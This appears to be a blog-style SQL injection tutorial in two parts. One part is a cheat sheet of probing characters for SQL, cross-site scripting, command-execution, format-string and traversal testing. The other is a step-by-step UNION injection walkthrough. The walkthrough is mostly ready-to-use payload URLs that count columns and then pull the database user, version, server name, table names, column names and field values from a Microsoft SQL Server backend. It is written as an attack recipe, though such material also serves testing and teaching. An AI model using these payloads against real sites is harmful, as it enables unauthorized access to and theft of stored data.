SQL Injection Walkthrough part V 1( input validation)

Input Validation Cheat Sheet

Related articles: SQL Injection Cheat Sheet

We sometimes carelessly throw characters up and about in an attempt to find a gem. This paper covers miscellaneous injection characters and their meanings when applied to web application testing.

Character(s) Details
NULL or null Often produces interesting error messages as the web application is expecting a value. It can also help us determine if the backend is a PL/SQL gateway.

{' , " , ; ,       Breaks an SQL string or query; used for SQL,
               XPath and XML Injection tests.
{– , = , + , "}      These characters are used to craft SQL
                Injection queries.
{‘ , &, ! , ¦ , < , >}       Used to find command execution
               vulnerabilities.
">        Used for basic Cross-Site Scripting Checks.
{%0d , %0a}       Carriage Return Line Feed (new line); all
               round bad.
{%7f , %ff}        byte-length overflows; maximum 7- and
                8-bit values.
{-1, other}       Integer and underflow vulnerabilities.
Ax1024+         Overflow vulnerabilities.
{%n , %x , %s}        Testing for format string vulnerabilities.
../            Directory Traversal Vulnerabilities.
{% , _, *}           Wildcard characters can sometimes present
             DoS issues or information disclosure.

Character(s) Details NULL or null
Often produces interesting error messages as the web application is expecting a value. It can also help us determine if the backend is a PL/SQL gateway.



These characters can be represented in many different ways (i.e. Unicode). It is important to understand this when restricting input to these character sets.

References:

• Mike Shema - Hack Notes
• w3schools

SQL Injection Walkthrough part IV

UNION SQL INJECTION - DETECTION

Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR


UNION SQL INJECTION - EXTRACT DATABASE USER

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--

[DB USER]


UNION SQL INJECTION - EXTRACT DATABASE NAME

http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--

[DB NAME]


UNION SQL INJECTION - EXTRACT DATABASE VERSION

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--

[DB VERSION]


UNION SQL INJECTION - EXTRACT SERVER NAME

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--

[SERVER NAME]


UNION SQL INJECTION - EXTRACT DATABASE TABLES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--

[TABLE NAME 1]


UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--

[COLUMN NAME 1]


UNION SQL INJECTION - EXTRACT 1st FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--

[FIELD 1 VALUE]


UNION SQL INJECTION - EXTRACT 2nd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--

[FIELD 2 VALUE]


UNION SQL INJECTION - EXTRACT 3nd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--

[FIELD 3 VALUE]